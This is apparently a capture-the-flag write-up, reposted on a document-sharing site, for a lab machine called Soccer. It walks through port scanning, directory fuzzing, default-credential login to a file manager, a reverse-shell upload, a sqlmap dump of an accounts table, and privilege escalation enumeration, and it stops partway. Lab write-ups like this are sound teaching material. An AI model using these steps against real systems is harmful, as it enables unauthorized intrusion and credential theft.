Add to collection(s) Add to saved
  1. No category
Uploaded by damiandamiansuarez

Soccer

advertisement 
Soccer:
TAGS: WebSocket, NodeJS, Blind SQL injection, WEB
In this blog, I’ll solve Soccer box.
Firstly, add soccer.htb to /etc/hosts
Nmap scan enumerates 3 opened ports: 22, 80 and 9091
$ nmap -p- --open -T5 -n 10.10.11.194 -o nmap.txt
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 10.10.11.194
Host is up (0.046s latency).
Not shown: 61116 closed tcp ports (conn-refused), 4416 filtered tcp ports (noresponse)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT
STATE SERVICE
22/tcp open ssh
80/tcp open http
9091/tcp open xmltec-xmlmail
When navigating to the website a non-interactive page is shown. Fuzzing with gobuster, /tiny
subdirectory is found:
gobuster dir -u http://soccer.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3medium.txt -t50
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:
http://soccer.htb
[+] Method:
GET
[+] Threads:
50
[+] Wordlist:
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent:
[+] Timeout:
gobuster/3.5
10s
===============================================================
2023/02/21 12:40:52 Starting gobuster in directory enumeration mode
===============================================================
/tiny
(Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]
Progress: 220414 / 220561 (99.93%)
===============================================================
2023/02/21 12:44:41 Finished
Visiting http://soccer.htb/tiny/ a login is found. By typing Tiny File Manager in Google
default credentials are found.
In the file manager, a reverse shell can be uploaded, as there are some php files I craft
pentestmonkey’s php reverse shell. After getting the shell through port 4444, in the /etc/hosts
there is a new domain so let’s add to the local machine /etc/hosts entry.
After registering on soc-player.soccer.htb web there is a ticket functionality
Intercepting with burp, we confirm that the website is using web sockets
Googling about web sockets I found a tool that acts as a MITM for payloads so I can use
Sqlmap. In the script there are 2 parameters that must be modified
Web application source code:
Code:
After running the script, sqlmap can be used to attack de DB in http://localhost:8081.
$ sqlmap -u http://localhost:8081/?id=1 -D soccer_db –tables -T accounts -C
username,password --dump
Let’s use these creds to login via ssh. To escalate privileges, use linpeas and perform an
Enumeration
[+] Checking doas.conf
permit nopass player as root cmd /usr/bin/dstat
Related documents
9/11 Q`s of the day
9/11 Q`s of the day
Proposal - Washington College
Proposal - Washington College
Exercise A P R E S C R I... F O R L I F E L...
Exercise A P R E S C R I... F O R L I F E L...
Download
advertisement